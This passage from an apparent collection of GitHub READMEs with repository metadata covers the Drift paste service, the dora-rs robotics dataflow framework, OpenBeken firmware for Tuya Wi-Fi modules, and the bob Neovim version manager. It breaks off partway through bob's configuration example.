- `GITHUB_CLIENT_SECRET`: the client secret for GitHub OAuth.
- `NEXTAUTH_URL`: the URL of the drift instance. Not required if hosting on Vercel.
- `CREDENTIAL_AUTH`: whether to allow username/password authentication. Defaults to `true`.
## Running with pm2
It's easy to start Drift using [pm2](https://pm2.keymetrics.io/).
First, add the `.env` file with your values (see the above section for the required options).
Then, use the following command to start the server:
- `pnpm build && pm2 start pnpm --name drift --interpreter bash -- start`
Refer to pm2's docs or `pm2 help` for more information.
## Running with Docker
## Running with systemd
_**NOTE:** We assume that you know how to enable user lingering if you don't want to use the systemd unit as root_
- As root
- Place the following systemd unit in ___/etc/systemd/system___ and name it _drift.service_
- Replace any occurrence of ___`$USERNAME`___ with the shell username of the user that will be running the Drift server
```
##########
# Drift Systemd Unit (Global)
##########
[Unit]
Description=Drift Server (Global)
After=default.target
[Service]
User=$USERNAME
Group=$USERNAME
Type=simple
WorkingDirectory=/home/$USERNAME/Drift
ExecStart=/usr/bin/pnpm start
Restart=on-failure
[Install]
WantedBy=default.target
```
- As a nomal user
- Place the following systemd unit inside ___/home/user/.config/systemd/user___ and name it _drift_user.service_
- Replace any occurrence of ___`$USERNAME`___ with the shell username of the user that will be running the Drift server
```
##########
# Drift Systemd Unit (User)
##########
[Unit]
Description=Drift Server (User)
After=default.target
[Service]
Type=simple
WorkingDirectory=/home/$USERNAME/Drift
ExecStart=/usr/bin/pnpm start
Restart=on-failure
[Install]
WantedBy=default.target
```
## Current status
Drift is a work in progress. Below is a (rough) list of completed and envisioned features. If you want to help address any of them, please let me know regardless of your experience and I'll be happy to assist.
- [x] Next.js 13 `app` directory
- [x] creating and sharing private, public, password-protected, and unlisted posts
- [x] syntax highlighting
- [x] expiring posts
- [x] responsive UI
- [x] user auth
- [ ] SSO via HTTP header (Issue: [#11](https://github.com/MaxLeiter/Drift/issues/11))
- [x] SSO via GitHub OAuth
- [x] downloading files (individually and entire posts)
- [x] password protected posts
- [x] postgres database
- [x] administrator account / settings
- [x] docker-compose (PRs: [#13](https://github.com/MaxLeiter/Drift/pull/13), [#75](https://github.com/MaxLeiter/Drift/pull/75))
- [ ] publish docker builds
- [ ] user settings
- [ ] works enough with JavaScript disabled
- [ ] in-depth documentation
- [x] customizable homepage, so the demo can exist as-is but other instances can be built from the same source. Environment variable for the file contents?
- [ ] fleshed out API
- [ ] Swappable database backends
- [ ] More OAuth providers
| Drift is a self-hostable Gist and paste service. Built with Next.js 13 and React Server Components. | gist,pastebin,pastebin-service,nodejs,nextjs,react,typescript,self-hosted,drift,nextjs13 | 0 | 14 | 90 | 470 | 29 | 24 | 1 |
dora-rs/dora | <p align="center">
<img src="./docs/src/logo.svg" width="400">
</p>
<h2 align="center">
<a href="https://www.dora-rs.ai">Website</a>
|
<a href="https://www.dora-rs.ai/docs/api/python-api">Python API</a>
-
<a href="https://docs.rs/dora-node-api/latest/dora_node_api/">Rust API</a>
|
<a href="https://www.dora-rs.ai/docs/guides/">Guide</a>
|
<a href="https://discord.gg/6eMGGutkfE">Discord</a>
</h2>
<div align="center">
<a href="https://github.com/dora-rs/dora/actions">
<img src="https://github.com/dora-rs/dora/workflows/CI/badge.svg" alt="Build and test"/>
</a>
<a href="https://crates.io/crates/dora-rs">
<img src="https://img.shields.io/crates/v/dora_node_api.svg"/>
</a>
<a href="https://docs.rs/dora-node-api/latest/dora_node_api/">
<img src="https://docs.rs/dora-node-api/badge.svg" alt="rust docs"/>
</a>
<a href="https://pypi.org/project/dora-rs/">
<img src="https://img.shields.io/pypi/v/dora-rs.svg" alt="PyPi Latest Release"/>
</a>
</div>
---
# What is dora-rs?
Dataflow-oriented robotic application (dora-rs) is a framework that makes creation of robotic applications fast and simple.
Building a robotic application can be summed up as bringing together hardwares, algorithms, and AI models, and make them communicate with each others. At dora-rs, we try to:
- make integration of hardware and software easy by supporting Python, C, C++, and also ROS2.
- make communication low latency by using zero-copy Arrow messages.
dora-rs is still experimental and you might experience bugs, but we're working very hard to make it stable as possible.
## Performance
dora-rs can show impressive performance, up to 17x faster compared to current status quo ROS2 in Python! This is the result of using our own shared memory server and Apache Arrow to achieve zero copy data passing.
<a href="https://www.dora-rs.ai/">
<img src="./docs/src/latency.png" align="center" width="600">
</a>
> See: https://github.com/dora-rs/dora-benchmark/tree/main for reproduction.
## Dataflow Paradigm
dora-rs implements a declarative dataflow paradigm where tasks are split between nodes isolated as individual processes.
Each node defines its inputs and outputs to connect with other nodes.
```yaml
nodes:
- id: webcam
custom:
source: webcam.py
inputs:
tick: dora/timer/millis/50
outputs:
- image
- id: object_detection
custom:
source: object_detection.py
inputs:
image: webcam/image
outputs:
- bbox
- id: plot
custom:
source: plot.py
inputs:
image: webcam/image
bbox: object_detection/bbox
```
Nodes can either be:
- custom nodes were dora-rs is embedded as a native libraries.
- runtime nodes were dora-rs takes care of the main loop and run user-defined operators. This make dora-rs featureful as we can run features like `hot-reloading`.
The dataflow paradigm has the advantage of creating an abstraction layer that makes robotic applications modular and easily configurable.
<a href="https://www.dora-rs.ai/">
<img src="https://raw.githubusercontent.com/dora-rs/dora-rs.github.io/main/static/img/overview.svg" align="center" width="600">
</a>
## Communication
Communication between nodes is handled with shared memory on a same machine and TCP on distributed machines. Our shared memory implementation tracks messages across processes and discards them when obsolete. Shared memory slots are cached to avoid new memory allocation.
## Message Format
Nodes communicate with Apache Arrow Data Format.
[Apache Arrow](https://github.com/apache/arrow-rs) is a universal memory format for flat and hierarchical data. The Arrow memory format supports zero-copy reads for lightning-fast data access without serialization overhead. It defines a C data interface without any build-time or link-time dependency requirement, that means that dora-rs has **no compilation step** beyond the native compiler of your favourite language.
<img align="center" src="https://github.com/dora-rs/dora-rs.github.io/blob/main/static/img/arrow.png?raw=true" width="600">
## Opentelemetry
dora-rs uses Opentelemetry to record all your logs, metrics and traces. This means that the data and telemetry can be linked using a shared abstraction.
[Opentelemetry](https://opentelemetry.io/) is an open source observability standard that makes dora-rs telemetry collectable by most backend such as elasticseach, prometheus, Datadog..
Opentelemetry is language independent, backend agnostic, and easily collect distributed data, making it perfect for dora-rs applications.
<img src="https://github.com/dora-rs/dora-rs.github.io/blob/main/static/img/opentelemetry.png?raw=true" align="center" width="600">
## Hot-Reloading
dora-rs implements Hot-Reloading for python which means you can change code at runtime in Python while keeping your state intact.
Using the feature flag: `--attach --hot-reload`, dora-rs watch for code change and reload nodes that has been modified.
You can check fail-safe mechanism at: https://github.com/dora-rs/dora/pull/239
<a href="http://www.youtube.com/watch?v=NvvTEP8Jak8">
<img align="center" width="600" alt="demo" src=http://img.youtube.com/vi/NvvTEP8Jak8/0.jpg>
</a>
## Self-Coding Robot: Code RAG (WIP)
You can easily create a self-coding robot, by combining Hot-reloading with a Retrieval Augmented Generation (RAG) that is going to generate code modification from your prompt.
See:[examples/python-operator-dataflow](examples/python-operator-dataflow)
<img src="https://github.com/dora-rs/dora-rs.github.io/blob/main/static/img/RAG.svg?raw=true" align="center" width="600">
Self-Coding Robot is just the tip of the iceberg of robotics combined with llm, that we hope to power. There is so much more that we haven't explored yet like:
- [self-debugging](https://arxiv.org/pdf/2304.05128.pdf)
- [memory](https://github.com/cpacker/MemGPT)
- [function calling](https://github.com/ShishirPatil/gorilla)
- ...
## Installation
Quickest way:
```bash
cargo install dora-cli --locked
pip install dora-rs # For Python API
dora --help
```
For more info on installation, check out [our guide](https://www.dora-rs.ai/docs/guides/Installation/installing).
## Getting Started
1. Install the example python dependencies:
```bash
pip install -r https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/requirements.txt
```
2. Get some example operators:
```bash
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/webcam.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/plot.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/utils.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/object_detection.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/dataflow.yml
```
3. Start the dataflow
```bash
dora up
dora start dataflow.yml --attach --hot-reload
```
> Make sure to have a webcam
To stop your dataflow, you can use <kbd>ctrl</kbd>+<kbd>c</kbd>
To go further, you can add a yolov8 operator, check out our getting started here: https://www.dora-rs.ai/docs/guides/getting-started/yolov8/
## ROS2 Bridge
- Compilation Free Message passing to ROS 2
- Automatic conversion ROS 2 Message <-> Arrow Array
```python
import random
import pyarrow as pa
# Configuration Boilerplate...
turtle_twist_writer = ...
## Arrow Based ROS2 Twist Message
## which does not requires ROS2 import
message = pa.array([{
"linear": {
"x": 1,
},
"angular": {
"z": 1
},
}])
turtle_twist_writer.publish(message)
```
> You might want to use ChatGPT to write the Arrow Formatting: https://chat.openai.com/share/4eec1c6d-dbd2-46dc-b6cd-310d2895ba15
## Hardwares
Cool hardware that we think might be good fit to try out dora-rs 🙋 We are not sponsored by manufacturers:
| | Price | Open Source | Github | type | Dora Project |
| --------------------------------- | ----- | ------------------ | ---------------------------------------------------- | ---------- | ------------------------------------------------------- |
| DJI Robomaster S1 | 550$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover | https://huggingface.co/datasets/dora-rs/dora-robomaster |
| DJI Robomaster EP Core | 950$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover, Arm | |
| DJI Tello | 100$ | | | Drone | |
| BitCraze Crazyflies | 225$ | Firmware, Lib, SDK | https://github.com/bitcraze | Drone | |
| AlexanderKoch-Koch/low_cost_robot | 250$ | Everything | https://github.com/AlexanderKoch-Koch/low_cost_robot | Arm | |
| xArm 1S | 200$ | | | Arm | |
| Wavego | 250$ | | | Quadruplet | |
| AINex | 800$ | | | Humanoid | |
> For more: https://docs.google.com/spreadsheets/d/1YYeW2jfOIWDVgdEgqnMvltonHquQ7K8OZCrnJRELL6o/edit#gid=0
## Documentation
The full documentation is available on [our website](https://www.dora-rs.ai)
## Discussions
Our main communication channels are:
- [Our Discord server](https://discord.gg/6eMGGutkfE)
- [Our Github Project Discussion](https://github.com/orgs/dora-rs/discussions)
Feel free to reach out on any topic, issues or ideas.
We also have [a contributing guide](CONTRIBUTING.md).
## Support Matrix
| | dora-rs | Hoped for |
| --------------------------------- | --------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------- |
| **Tier 1 Support** | Python, Rust | C, C++, ROS 2 |
| **Tier 2 Support** | C, C++, ROS2 |
| **Hot-reloading** | Python | Rust (https://github.com/orgs/dora-rs/discussions/360) |
| **Message Format** | Arrow | Native |
| **Local Communication** | Shared Memory | Custom Middleware, [zero-copy GPU IPC](https://arrow.apache.org/docs/python/api/cuda.html), intra-process `tokio::channel` communication |
| **Remote Communication** | TCP (See: https://github.com/dora-rs/dora/issues/459) | Custom Middleware, [Zenoh](https://zenoh.io/) |
| **Metrics, Tracing, and Logging** | Opentelemetry | Native logging libraries into Opentelemetry |
| **Data archives** | Parquet ([dora-record](libraries/extensions/dora-record)) |
| **Visualization and annotation** | OpenCV | [rerun.io](rerun.io) |
| **Supported Platforms (x86)** | Windows, macOS, Linux |
| **Supported Platforms (ARM)** | macOS, Linux |
| **Configuration** | YAML |
### Unstable functionality
`dora-rs` Ros2 Bridge is marked as **unstable**.
There are a number of reasons functionality may be marked as unstable:
- We are unsure about the exact API. The name, function signature, or implementation are likely to change in the future.
- The functionality is not tested extensively yet. Bugs may pop up when used in real-world scenarios.
- The functionality does not integrate well with the full dora-rs API. You may find it works in one context but not in another.
Releasing functionality as unstable allows us to gather important feedback from users that use dora-rs in real-world scenarios.
This helps us fine-tune things before giving it the final stamp of approval.
Users are only interested in solid, well-tested functionality can avoid this part of the API.
Functionality marked as unstable may change at any point without it being considered a breaking change.
## License
This project is licensed under Apache-2.0. Check out [NOTICE.md](NOTICE.md) for more information.
| DORA (Dataflow-Oriented Robotic Application) is middleware designed to streamline and simplify the creation of AI-based robotic applications. It offers low latency, composable, and distributed dataflow capabilities. Applications are modeled as directed graphs, also referred to as pipelines. | dataflow,low-latency,robotics,rust,embodied-ai | 35 | 16 | 368 | 2,248 | 46 | 31 | 4 |
openshwprojects/OpenBK7231T_App | # Introduction
OpenBK7231T/OpenBeken is a Tasmota/Esphome replacement for new Tuya modules featuring MQTT and Home Assistant compatibility.
This repository is named "OpenBK7231T_App", but now it's a multiplatform app, supporting build for multiple separate chips:
- [BK7231T](https://www.elektroda.com/rtvforum/topic3951016.html) ([WB3S](https://developer.tuya.com/en/docs/iot/wb3s-module-datasheet?id=K9dx20n6hz5n4), [WB2S](https://developer.tuya.com/en/docs/iot/wb2s-module-datasheet?id=K9ghecl7kc479), WB2L, etc)
- [BK7231N](https://www.elektroda.com/rtvforum/topic3951016.html) ([CB2S](https://developer.tuya.com/en/docs/iot/cb2s-module-datasheet?id=Kafgfsa2aaypq), [CB2L](https://developer.tuya.com/en/docs/iot/cb2l-module-datasheet?id=Kai2eku1m3pyl), [WB2L_M1](https://www.elektroda.com/rtvforum/topic3903356.html), etc)
- [BK7231M](https://www.elektroda.com/rtvforum/topic4058227.html), this is a non-Tuya version of BK7231N with 00000000 keys, also sometimes in BL2028 flavour
- T34 ([T34 is based on BK7231N](https://developer.tuya.com/en/docs/iot/t34-module-datasheet?id=Ka0l4h5zvg6j8)), see [flashing trick](https://www.elektroda.com/rtvforum/topic4036975.html)
- BL2028N ([BL2028N is a Belon version of BK7231N](https://www.elektroda.com/rtvforum/viewtopic.php?p=20262533#20262533))
- [XR809](https://www.elektroda.com/rtvforum/topic3806769.html) ([XR3](https://developer.tuya.com/en/docs/iot/xr3-datasheet?id=K98s9168qi49g), etc)
- [BL602](https://www.elektroda.com/rtvforum/topic3889041.html) ([SM-028_V1.3 etc](https://www.elektroda.com/rtvforum/topic3945435.html)), see also [BL602 flash OBK via OTA tutorial](https://www.elektroda.com/rtvforum/topic4050297.html)
- [LF686](https://www.leapfive.com/wp-content/uploads/2020/09/LF686-Datasheet.pdf) (flash it [as BL602](https://www.elektroda.com/rtvforum/topic4024917.html))
- W800 (W800-C400, WinnerMicro WiFi & Bluetooth), W801
- [W600](https://www.elektroda.com/rtvforum/viewtopic.php?p=20252619#20252619) (WinnerMicro chip), W601 ([WIS600, ESP-01W](https://www.elektroda.com/rtvforum/topic3950611.html), [TW-02](https://www.elektroda.com/rtvforum/viewtopic.php?p=20239610#20239610), [TW-03](https://www.elektroda.com/rtvforum/topic3929601.html), etc)
- [LN882H](https://www.elektroda.com/rtvforum/topic4027545.html) by Lightning Semi - [datasheet](https://www.elektroda.com/rtvforum/topic4027545.html), see [flashing how-to](https://www.elektroda.com/rtvforum/topic4028087.html), see [sample device teardown and flashing](https://www.elektroda.com/rtvforum/topic4032240.html), see [new flash tool](https://www.elektroda.com/rtvforum/topic4045532.html), see [dev board](https://www.elektroda.com/rtvforum/topic4050274.html)
- Windows, via [simulator](https://www.elektroda.com/rtvforum/topic4046056.html)
Please use automatically compiled binaries from the Releases tab. To build yourself for a given platform, just checkout first our version of SDK and then checkout this app repository into it, details later.
See our guides in Russian: [BK7231N/T34](https://www.v-elite.ru/t34), and [BL602 RGB](https://www.v-elite.ru/bl602rgb), and [Youtube guide for BK7231/T34](https://www.youtube.com/watch?v=BnmSWZchK-E)
If you want to get some generic information about BK7231 modules, available datasheets, pinout, peripherals, [consult our docs topic](https://www.elektroda.com/rtvforum/topic3951016.html).
# [Supported Devices/Templates List](https://openbekeniot.github.io/webapp/devicesList.html) Now with 500+ entries! (Get 🏆[free SD Card](https://www.elektroda.com/rtvforum/topic3950844.html)🏆 for submitting new one!)
We have our own interactive devices database that is maintained by users.
The database is also accessible from inside our firmware (but requires internet connection to fetch).
Have a not listed device? HELP US, submit a teardown [here](https://www.elektroda.com/rtvforum/posting.php?mode=newtopic&f=51) and 🏆**get free SD card and gadgets set**🏆 ! Thanks to cooperation with [Elektroda.com](https://www.elektroda.com/), if you submit a detailed teardown/article/review, we can send you [this set of gadgets](https://obrazki.elektroda.pl/1470574200_1670833596.jpg) for free (🚚shipping with normal letter🚚).
NOTE: Obviously almost any device with supported chip (BK7231, BL602, W600, etc is potentially supported and it's not possible to list all available devices in the market, so feel free to try even if your device is not listed - *we are [here](https://www.elektroda.com/rtvforum/forum390.html) to help and guide you step by step*!)
# [Our Youtube Channel](https://www.youtube.com/@elektrodacom) (See step by step guides for flashing and setup)
We have our own Youtube channel with OBK-related guides. Please see our playlists:
- [flashing guides playlist](https://www.youtube.com/playlist?list=PLzbXEc2ebpH0CZDbczAXT94BuSGrd_GoM)
- [generic setup hints, tricks, tips](https://www.youtube.com/playlist?list=PLzbXEc2ebpH0I8m_Cfbqv1MTlQuBKYvlx)
You can help us by giving like, a comment and subscribe!
# Features
OpenBeken features:
- Tasmota-like setup, configuration and experience on all supported platforms (supports [common Tasmota JSON over http](https://www.youtube.com/watch?v=OhdkEJ-SuTU) and MQTT, etc)
- OTA firmware upgrade system (for BK, W*00, BL602, LN); to use OTA, [drag and drop](https://www.youtube.com/watch?v=OPcppowaxaA) proper OTA file on OTA field on new Web App Javascript Console
- Online [builds for all platforms](https://github.com/openshwprojects/OpenBK7231T_App/releases) via Github, configurable [per-user build system](https://www.elektroda.com/rtvforum/topic4033833.html), also supports [Docker builds](https://github.com/openshwprojects/OpenBK7231T_App/tree/main/docker)
- MQTT compatibility with Home Assistant (with both Yaml generator and [HA Discovery](https://youtu.be/pkcspey25V4))
- Support for multiple relays, buttons, leds, inputs and PWMs, everything fully scriptable
- [Driver system](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/docs/drivers.md) for custom peripherals, including [TuyaMCU](https://www.elektroda.com/rtvforum/topic4038151.html) (see [Dimmer tutorial](https://www.elektroda.com/rtvforum/topic3898502.html)), I2C bus and [BL0942](https://www.elektroda.com/rtvforum/topic3887748.html), BL0937 power metering chips, Motor Driver Bridge.
- Hardware and software I2C, supports multiple I2C devices, like TC74 temperature sensor, MCP23017 port expander, PCF8574T LCD 2x16 (or other?), etc
- Hardware and software SPI, support for SPI BL0942, etc
- NTP time from network (can be used with [TH06](https://www.elektroda.com/rtvforum/topic3942730.html) and other TuyaMCU devices), can run any script on selected weekday hour:minute:second
- Dedicated [TuyaMCU support](https://www.elektroda.com/rtvforum/topic4038151.html) with extra TuyaMCU analyzer tool for decoding new devices ([tutorial here](https://www.elektroda.com/rtvforum/topic3970199.html), code [repository here](https://github.com/openshwprojects/TuyaMCUAnalyzer))
- support for [TuyaMCU Battery Powered devices protocol](https://www.elektroda.com/rtvforum/topic3914412.html) (TuyaMCU enables WiFi module only to report the state, eg. for door sensors, water sensors)
- [RGBCW LED lighting control](https://www.youtube.com/watch?v=YQdR7r6lXRY) compatible with Home Assistant (including PWM LEDs, and SM2135, BP5758, [SM15155](https://www.elektroda.com/rtvforum/topic4060227.html) etc )
- LittleFS integration for scripts and large files (you can [write scripts there](https://www.youtube.com/watch?v=kXi8S12tmC8), you can host a page there with [REST interface control](https://www.elektroda.com/rtvforum/topic3971355.html) of device)
- Command line system for starting and configuring drivers, for controlling channels, etc
- Short startup command (up to 512 characters) storage in flash config, so you can easily init your drivers (eg. BL0942) without LittleFS
- Advanced scripting and events system (allows you to mirror Tasmota rules, for example catch button click, double click, hold)
- Easily configurable via commands (see [tutorial](https://www.elektroda.com/rtvforum/topic3947241.html))
- Thanks to keeping Tasmota standard, OBK has basic compatibility with [ioBroker](https://www.youtube.com/watch?v=x4p3JHXbK1E&ab_channel=Elektrodacom) and similar systems through TELE/STAT/CMND MQTT packets, Tasmota Control app is also supported
- [DDP lighting protocol support](https://www.elektroda.com/rtvforum/topic4040325.html) ("startDriver DDP" in autoexec.bat/short startup command), works with xLights,
- Can be scripted to even [work with shutters](https://www.elektroda.com/rtvforum/topic3972935.html), see also [second shutters script](https://www.elektroda.com/rtvforum/viewtopic.php?p=20910126#20910126)
- Password-protected Web security [see tutorial](https://www.elektroda.com/rtvforum/topic4021160.html)
- Advanced deep sleep with GPIO/timer wakeup and [hybrid power save systems](https://youtu.be/eupL16eB7BA), fully scriptable, can be configured to last longer than Tuya
- Supports automatic GPIO setup with [Tuya GPIO extraction](https://www.youtube.com/watch?v=WunlqIMAdgw), [cloudcutter templates](https://www.elektroda.com/rtvforum/topic3973669.html), can also import/export [OpenBeken templates](https://openbekeniot.github.io/webapp/devicesList.html), you can also use [GPIODoctor to find out quickly GPIO roles](https://www.elektroda.com/rtvforum/topic3976371.html)
- Advanced and custom drivers like [synchronized PWM groups with configurable dead time](https://www.elektroda.com/rtvforum/topic4025665.html)
- WS2812B support, see [scripting tutorial](https://www.elektroda.com/rtvforum/topic4036716.html)
- LFS and REST API allows you to create and host a custom HTML+CSS+JS page on device with a custom GUI/display of channels/TuyaMCU dpIDs, see [tutorial](https://www.elektroda.com/rtvforum/topic3971355.html) and see [sample page](https://www.elektroda.com/rtvforum/viewtopic.php?p=20932186#20932186) , and see [final version of custom TOMPD-63-WIFI page](https://www.elektroda.com/rtvforum/topic4040354.html)
- can control 'smart lab organiser drawers' with a custom Drawers driver, see [full presentation](https://www.elektroda.com/rtvforum/topic4054134.html)
- Can run on Windows with device simulator/schematic drawer, see [tutorial](https://www.elektroda.com/rtvforum/topic4046056.html)
- and much more
There is also a bit more outdated [WIKI](https://github.com/openshwprojects/OpenBK7231T_App/wiki/Wiki-Home)
# Building
OpenBeken supports [online builds](https://www.elektroda.com/rtvforum/viewtopic.php?p=20946719#20946719) for all platforms (BK7231T, BK7231N, XR809, BL602, W800), but if you want to compile it yourself, see [BUILDING.md](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/BUILDING.md)
# Developer guides
- online builds system [guide](https://www.elektroda.com/rtvforum/viewtopic.php?p=20946719#20946719)
- how to [create custom obk driver](https://www.elektroda.com/rtvforum/topic4056286.html)
- how to [analyze unknown protocol with Salae logic analyzer](https://www.elektroda.com/rtvforum/topic4035491.html)
- obk [simulator short presentation](https://www.elektroda.com/rtvforum/topic4046056.html)
# Flashing
See [our GUI easy flash tool](https://github.com/openshwprojects/BK7231GUIFlashTool), also see [FLASHING.md](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/FLASHING.md)
# [Docs - MQTT topics, Console Commands, Flags, Constants, Pin Roles, Channel Types, FAQ, autoexec.bat examples](https://github.com/openshwprojects/OpenBK7231T_App/blob/main/docs)
# Further reading
For technical insights and generic SDK information related to Beken, WinnerMicro, Bouffallo Lab and XRadio modules, please refer:
https://www.elektroda.com/rtvforum/topic3850712.html
https://www.elektroda.com/rtvforum/topic3866123.html
https://www.elektroda.com/rtvforum/topic3806769.html
# Support project
If you want to support project, please donate at: https://www.paypal.com/paypalme/openshwprojects
Special thanks for Tasmota/Esphome/etc contributors for making a great reference for implementing Tuya module drivers
| Open source firmware (Tasmota/Esphome replacement) for BK7231T, BK7231N, BL2028N, T34, XR809, W800/W801, W600/W601 and BL602 | wifi,iot,mqtt,smart-home,tuya,tasmota,bk7231,bk7231n,bk7231t,bl602 | 1,000 | 73 | 524 | 3,467 | 407 | 59 | 1 |
MordechaiHadad/bob | <div align="center">
<img src="resources/bob-nvim-logo-2-transparent-bg.png" width=315>
</div>
# Bob
> Struggle to keep your Neovim versions in check? Bob provides an easy way to install and switch versions on any system!
Bob is a cross-platform and easy-to-use Neovim version manager, allowing for easy switching between versions right from the command line.
## 🌟 Showcase
<img src="./resources/tapes/demo.gif">
## 🔔 Notices
- **2022-10-29**: Moved bob's symbolic link and downloads folder on macos from `/Users/user/Library/Application Support` to `~/.local/share` please make sure to move all of your downloads to the new folder, run `bob use <your desired version>` and update your PATH
- **2023-02-13**: Bob has recently switched to using a proxy executable for running Neovim executables. To switch from the old method that Bob used, follow these steps:
1. Remove the current Neovim path from your global $PATH environment variable.
2. Delete the following directory:
On Unix: `~/.local/share/neovim`
On Windows: `C:\Users\<username>\AppData\Local\neovim`
Secondly the name of the downloads directory property in the configuration file has changed. Please refer to the updated list of properties for the new name.
- **2024-03-04**: Due to Neovim's recent MacOS binary changes, bob now supports arm completely, but unfortunately, it comes with some breaking changes specifically for bob's proxy executable. To fix that, follow these steps (which will not be necessary soon):
1. Remove `nvim` binary from `nvim-bin` which is located in the same directory the same as the neovim binaries downloads folder.
2. Copy your newly downloaded bob binary and put the copy inside of `nvim-bin`
3. Rename your bob binary inside `nvim-bin` to `nvim`.
- **2024-05-17**: Support for `nvim-qt` is now deprecated as Neovim no longer supports it in newer releases. If you're currently using `nvim-qt`, we recommend switching to a different Neovim GUI or using Neovim in the terminal. Please refer to the Neovim documentation for more information on supported GUIs.
- **2024-05-19**: Important notice for users who built Neovim from source using a commit hash before the newest Bob version: Due to recent changes in Bob, these versions will need to be rebuilt. Alternatively, you can manually add a file named `full-hash.txt` at the root of the directory. This file should contain the full hash of the commit used to build Neovim. This change ensures better tracking and management of versions built from source. We apologize for any inconvenience and appreciate your understanding.
## 📦 Requirements
Make sure you don't have Neovim already installed via other ways e.g. a package manager.
#### Building bob
Make sure [rustup](https://www.rust-lang.org/tools/install) is installed.
(Optional) `openssl` if built with `native-tls` feature.
#### Building Neovim
For further information refer to the [Neovim wiki](https://github.com/neovim/neovim/wiki/Building-Neovim#build-prerequisites).
<details>
<summary>All platforms</summary>
- CMake
- Git
</details>
<details>
<summary>Windows</summary>
- [Visual Studio Build Tools](https://visualstudio.microsoft.com/visual-cpp-build-tools/) with C++ extension pack
</details>
<details>
<summary>Unix</summary>
- Clang or GCC
**MacOS note**: [follow these instructions](https://github.com/neovim/neovim/wiki/Building-Neovim#macos--homebrew)
</details>
## 🔧 Installation
### Install from releases
1. Download the bob release suitable for your platform: either `bob-{platform}-x86_64.zip` for the standard version or `bob-{platform}-x86_64-openssl.zip` for the OpenSSL version.
2. Unzip it
3. Run it with `bob`
### Install with pacman
1. On Arch Linux, you can install `bob` from the [extra repository](https://archlinux.org/packages/extra/x86_64/bob/) using pacman: `pacman -S bob`
2. Run it with `bob`
### Install from source
For the standard version:
1. `cargo install --git https://github.com/MordechaiHadad/bob.git`
2. Run Bob with `bob`
For the OpenSSL version:
1. To install, include the `--no-default-features --features native-tls` flags with your command: `cargo install --git https://github.com/MordechaiHadad/bob.git --no-default-features --features native-tls`
2. Run Bob with `bob`
### Install from crates.io
1. `cargo install bob-nvim`
2. Run bob with `bob`
## ❓ Usage
A version-string can either be `vx.x.x` or `x.x.x` examples: `v0.6.1` and `0.6.0`
---
- `bob use |nightly|stable|latest|<version-string>|<commit-hash>|`
`--no-install` flag will prevent bob from auto invoking install command when using `use`
Switch to the specified version, by default will auto-invoke install command if the version is not installed already
---
- `bob install |nightly|stable|latest|<version-string>|<commit-hash>|`
Install the specified version, can also be used to update out-of-date nightly version.
---
- `bob sync`
If Config::version_sync_file_location is set, the version in that file will be parsed and installed.
---
- `bob uninstall [|nightly|stable|latest|<version-string>|<commit-hash>|]`
Uninstall the specified version. If no version is specified a prompt is used to select all the versions
to be uninstalled.
---
- `bob rollback`
Rollback to an existing nightly rollback
---
- `bob erase`
Erase any change bob ever made including Neovim installation, Neovim version downloads and registry changes.
---
- `bob list`
List all installed and used versions.
---
- `bob complete bash|elvish|fish|powershell|zsh`
Generate shell completion.
---
- `bob update |nightly|stable|--all|`
Update existing version, can specify either a version or the flag `--all`
---
- `bob list-remote`
List all remote neovim versions available for download.
---
## ⚙ Configuration
This section is a bit more advanced and thus the user will have to do the work himself since bob doesn't do that.
Bob's configuration file can be written in either JSON or TOML format. The file should be located at `config_dir/bob/config.json` or `config_dir/bob/config.toml` respectively. However, the location of the configuration file can be customized as explained [below](#config-location), to be more specific:
<details>
<summary>On Linux</summary>
`/home/user/.config/bob/config.json|toml`
</details>
<details>
<summary>On Windows</summary>
`C:\Users\user\AppData\Roaming\bob\config.json|toml`
</details>
<details>
<summary>On MacOS</summary>
`/Users/user/Library/Application Support/bob/config.json|toml`
</details>
### Increasing Github rate-limit
It is possible to use `GITHUB_TOKEN` to prevent rate-limit for API calls. There are two ways to do it:
- You can prepend any of the `bob` commands with `GITHUB_TOKEN=<your token>`
```console
GITHUB_TOKEN=<some token> bob update -a
```
- perform `export GITHUB_TOKEN=<your token>` and then run `bob` commands.
```console
export GITHUB_TOKEN=<some token>
bob update -a
```
### <a name="config-location"></a>Custom Location
Bob's config file location can be configured by using an environment variable called `$BOB_CONFIG`.
Example: `export BOB_CONFIG=/path/to/config/config.json|toml`
### Syntax
| Property | Description | Default Value |
| -------------------------------| ---------------------------------------------------------------------------------------------------------------------------------------------------------------| --------------------------------------------------------------------------------------------------------------|
| **enable_nightly_info** | Will show new commits associated with new nightly release if enabled | `true` |
| **enable_release_build** | Compile neovim nightly or a certain hash version as a release build (slightly improved performance, no debug info) | `false` |
| **downloads_location** | The folder in which neovim versions will be downloaded to, bob will error if this option is specified but the folder doesn't exist | unix: `/home/<username>/.local/share/bob`, windows: `C:\Users\<username>\AppData\Local\bob` |
| **installation_location** | The path in which the proxied neovim installation will be located in | unix: `/home/<username>/.local/share/bob/nvim-bin`, windows: `C:\Users\<username>\AppData\Local\bob\nvim-bin` |
| **version_sync_file_location** | The path to a file that will hold the neovim version string, useful for config version tracking, bob will error if the specified file is not a valid file path | `Disabled by default` |
| **rollback_limit** | The amount of rollbacks before bob starts to delete older ones, can be up to 255 | `3` |
| **github_mirror** | Specify the github mirror to use instead of `https://github.com`, example: `https://mirror.ghproxy.com` | `Disabled by default` |
### Example
```jsonc
// /home/user/.config/bob/config.json
{
"enable_nightly_info": true, // Will show new commits associated with new nightly release if enabled
"enable_release_build": false, // Compile neovim nightly or a certain hash version as a release build (slightly improved performance, no debug info)
"downloads_location": "$HOME/.local/share/bob", // The folder in which neovim versions will be installed too, bob will error if this option is specified but the folder doesn't exist
